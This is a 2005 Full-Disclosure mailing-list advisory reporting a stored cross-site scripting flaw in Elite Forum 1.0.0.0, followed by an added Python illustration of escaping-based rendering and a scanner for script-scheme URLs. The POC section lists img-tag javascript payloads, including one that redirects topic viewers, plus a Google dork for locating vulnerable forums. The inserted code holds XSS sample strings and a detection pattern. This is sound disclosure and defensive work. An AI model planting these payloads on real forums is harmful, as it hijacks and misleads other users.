[Full-disclosure] HYSA-2005-009 Elite Forum 1.0.0.0 XSS Vulnerability

From: h4cky0u (h4cky0u.org_at_gmail.com)
Date: 11/01/05

    Date: Tue, 1 Nov 2005 15:16:13 +0530
    To: full-disclosure@lists.grok.org.uk

    ------------------------------------------------------
    HYSA-2005-009 h4cky0u.org <http://h4cky0u.org> Advisory 009
    ------------------------------------------------------
    Date - Tue Nov 1 2005

    TITLE:
    ======

    Elite Forum 1.0.0.0 XSS Vulnerability

    SEVERITY:
    =========

    Medium

    SOFTWARE:
    =========

    Elite Forum 1.0.0.0

    INFO:
    =====

    Elite Forum is a fierce competitor entering the world of forum systems.
    Unlike many other choices, Elite Forum does not require the hassle of a
    MySQL database. Elite Forum is one of the best and is packed full of
    features, including the following: No MySQL database required, Very easy
    installation, Support for both user registration and guests, Private
    Messaging System, Forum can be locked so registration is required, User,
    forum and topic statistics, Fast and easy to use search system, Ability to
    view who is currently browsing the forum, Sticky Topics (Announcements),
    Full member list, Unlimited users, topics and posts, Member Profiles/Stats,
    Multiple page support (both topics and posts user definable), Selectable
    time offset, Ability to auto check for updates/patches, Clean and
    streamlined design, Smiley Support, BB Code and auto url support, Topic
    status icons, Member and Guest user levels, Members can edit or delete
    their posts, Secure accounts, Add or remove admins via administrator panel,
    Admins can edit/delete any post or topic.

    Support Website :
    http://www.all-interviews.com/firestorm/?act=eliteforum
    (Down at the time of Bug Discovery)

    BUG DESCRIPTION:
    ================

    The system is vulnerable to Cross Site Scripting attacks. This issue is due
    to a failure of the application to properly sanitize user-supplied input.

    POC:
    ====

    First find a forum running the Elite Forum package. Then click on a topic
    and then Post Reply. In the message box add any of the following codes.
    Here are some examples:

    <img src="javascript:void(window.location=('imagelink'))"> - Replace the
    imagelink with the link to the image you want to redirect the users
    viewing the topic containing this code.

    <img src="javascript:a=100;while(a>=0){alert(a);a--}">

    <img src="javascript:a=1;while(a>0){alert("sup?")">

    VENDOR STATUS:
    ==============

    The support site is down and no vendor contact could be found.

    FIX:
    ====

    No fix is available as of the date of this advisory.
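    The bug description above attributes the issue to missing sanitization of
    user-supplied post content, and no vendor fix is reported. The following
    is an added illustration, not code from Elite Forum or from the advisory
    author, of the kind of post rendering that closes this class of bug: the
    whole post is HTML-escaped, and only a BB-code [img] tag is re-enabled,
    with the image URL accepted only when it carries an http or https scheme.
    It goes a little beyond the advisory's payloads by also rejecting
    mixed-case and control-character-obfuscated script schemes. The forum's
    implementation language is not stated on the page, so Python is used
    here; the function names, the `ALLOWED_SCHEMES` set and the sample posts
    are all constructed for this example.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample post bodies for demonstration; none come from a real forum.
SAMPLE_POSTS = [
    "Check this [img]http://example.com/a.png[/img]",
    '<img src="javascript:alert(1)">',          # raw HTML typed into the post
    "[img]javascript:alert(1)[/img]",           # script URL via BB code
    "[img]JaVaScRiPt:alert(1)[/img]",           # mixed-case scheme
    "[img]java\tscript:alert(1)[/img]",         # control char inside the scheme
    "[img]//example.org/b.gif[/img]",           # scheme-relative: nothing to vet
]

# Hypothetical policy for this example: only absolute http(s) image URLs.
ALLOWED_SCHEMES = {"http", "https"}
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def safe_image_url(raw):
    """Return the URL if it is an absolute http(s) URL, otherwise None.

    Browsers ignore ASCII control characters and whitespace inside a URL
    scheme, so those are stripped before the scheme is examined. urlsplit
    lowercases the scheme, which handles the mixed-case variant.
    """
    cleaned = re.sub(r"[\x00-\x20]", "", raw)
    parts = urlsplit(cleaned)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return cleaned


def render_post(text):
    """HTML-escape the whole post, then re-enable only [img] with a vetted URL.

    Escaping first means a literal <img> tag typed by the user is displayed
    as text; only the BB-code form can produce a real image element.
    """
    escaped = html.escape(text, quote=True)

    def replace_img(match):
        # The URL was escaped along with the rest of the post; undo that
        # before vetting, then re-escape the accepted value for the attribute.
        url = safe_image_url(html.unescape(match.group(1)))
        if url is None:
            return "[img removed: disallowed URL]"
        return '<img src="%s" alt="">' % html.escape(url, quote=True)

    return IMG_TAG.sub(replace_img, escaped)


def audit_posts(posts):
    """Triage check for posts already stored under the old renderer.

    Returns the indexes of posts carrying a script-scheme URL, with control
    characters removed before matching so obfuscated schemes are not missed.
    """
    hits = []
    for index, post in enumerate(posts):
        cleaned = re.sub(r"[\x00-\x20]", "", post).lower()
        if "javascript:" in cleaned or "vbscript:" in cleaned:
            hits.append(index)
    return hits


if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print(repr(post), "->", render_post(post))
    print("stored posts needing review:", audit_posts(SAMPLE_POSTS))
```

    The order matters: escaping everything and then selectively re-enabling
    a small, vetted markup subset is far easier to get right than trying to
    filter dangerous tags out of raw HTML. `audit_posts` is a coarse
    substring check meant for finding existing posts to review, not a
    replacement for the renderer.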

    GOOGLEDORK:
    ===========

    "Powered by Elite Forum"

    CREDITS:
    ========

    This vulnerability was discovered and researched by
    Gladiator.KHF(handle/username - gladiator) of h4cky0u Security Forums.

    mail : gleden123 at Yahoo dot Com

    web : http://www.h4cky0u.org

    ORIGINAL ADVISORY:
    ==================

    http://www.h4cky0u.org/advisories/HYSA-2005-009-elite-forum.txt

    --
    http://www.h4cky0u.org
    (In)Security at its best...
    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/

